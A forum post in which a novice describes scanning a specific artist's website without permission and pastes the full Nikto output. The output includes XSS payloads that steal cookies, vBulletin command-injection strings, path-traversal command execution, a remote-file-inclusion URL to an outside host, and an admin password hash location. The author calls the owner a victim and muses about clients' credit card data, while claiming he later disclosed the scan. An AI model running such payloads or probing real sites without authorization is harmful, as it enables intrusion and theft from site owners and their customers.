My First Site Hack.

Hello peeps, instead of posting in comments I decided to post a new thread in the forum. This way it will be easier to keep it organised. Also this is a site for noobs and sometimes it helps other noobs to see what other noobs are doing and the process they are going through to learn. I myself have been a teacher and have found that most people are afraid of asking questions in fear of looking stupid. Trust me this is not a problem I have. Ok down to business,

I did recon on my victim and am pretty sure he is not hacking savvy although he has skills with computers. With this information i decided to use Nikto as I am sure he does not have a IDS (intrusion detection system such as snort) in place. Now the web host might notice the scan but I am pretty sure he wont. Nikto results listed below

Server: Apache/2.2.26 (Unix) modssl/2.2.26 OpenSSL/1.0.1e-fips modauthpassthrough/2.1 modbwlimited/1.4 FrontPage/5.0.2.2635 modfcgid/2.3.6

• Retrieved x-powered-by header: PHP/5.4.24
• No CGI Directories found (use '-C all' to force check all possible dirs)
• robots.txt contains 2 entries which should be manually viewed.
• modssl/2.2.26 appears to be outdated (current is at least 2.8.31) (may depend on server version)
• Number of sections in the version string differ from those in the database, the server reports: openssl/1.0.1e-fips while the database has: 1.0.0.100. This may cause false positives.
• FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version)
• DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
• OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
• FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
• modssl/2.2.26 OpenSSL/1.0.1e-fips modauthpassthrough/2.1 modbwlimited/1.4 FrontPage/5.0.2.2635 modfcgid/2.3.6 - modssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
• OSVDB-44056: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
• /servlet/webacc?User.html=noexist: Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.
• OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
• /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&idcat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parentid=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
• /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=MembersList&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
• OSVDB-2946: /forummembers.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
• OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
• OSVDB-12184: /some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
• OSVDB-12184: /some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
• OSVDB-12184: /some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
• OSVDB-3092: /cart/: This might be interesting...
• OSVDB-3092: /members/: This might be interesting...
• OSVDB-3092: /register/: This might be interesting...
• OSVDB-3092: /shop/: This might be interesting...
• OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
• OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
• OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
• OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
• OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
• OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
• OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
• OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
• OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely. http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@(i deleted this)', password file location 'ansdata/ans.passwd'
• OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
• OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
• OSVDB-3092: /bo/: This might be interesting... potential country code (Bolivia)
• OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
• /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
• OSVDB-3092: /license.txt: License file found may identify site software.
• /wordpress/: A Wordpress installation was found.
• 6448 items checked: 33 error(s) and 39 item(s) reported on remote host
• End Time: 2014-03-30 14:50:10 (5524 seconds)

As you can see this guys site is a mess, I even know where his admin pw location is. And btw this guy has allot of wealthy (hes and artist also much more successful than i am) clients and they buy from him, can you say Credit Card info. I also got all his php info

I always like to start at the top of things so what I am seeing is that TRACE is on, which is a hack that I can learn and exploit. (already checked into xst) and allot of potential for xss hacks and not to mention hes running wordpress.

Full disclosure I have already emailed the victim informing him that he has been pen tested so have no intentions of actually hacking, I actually hope he contacts me for the information i gathered and I make a few bucks. I will post more in comments as I work on this site. I would ask for advice but i am noticing i never get any lol, experience is the great teacher I agree.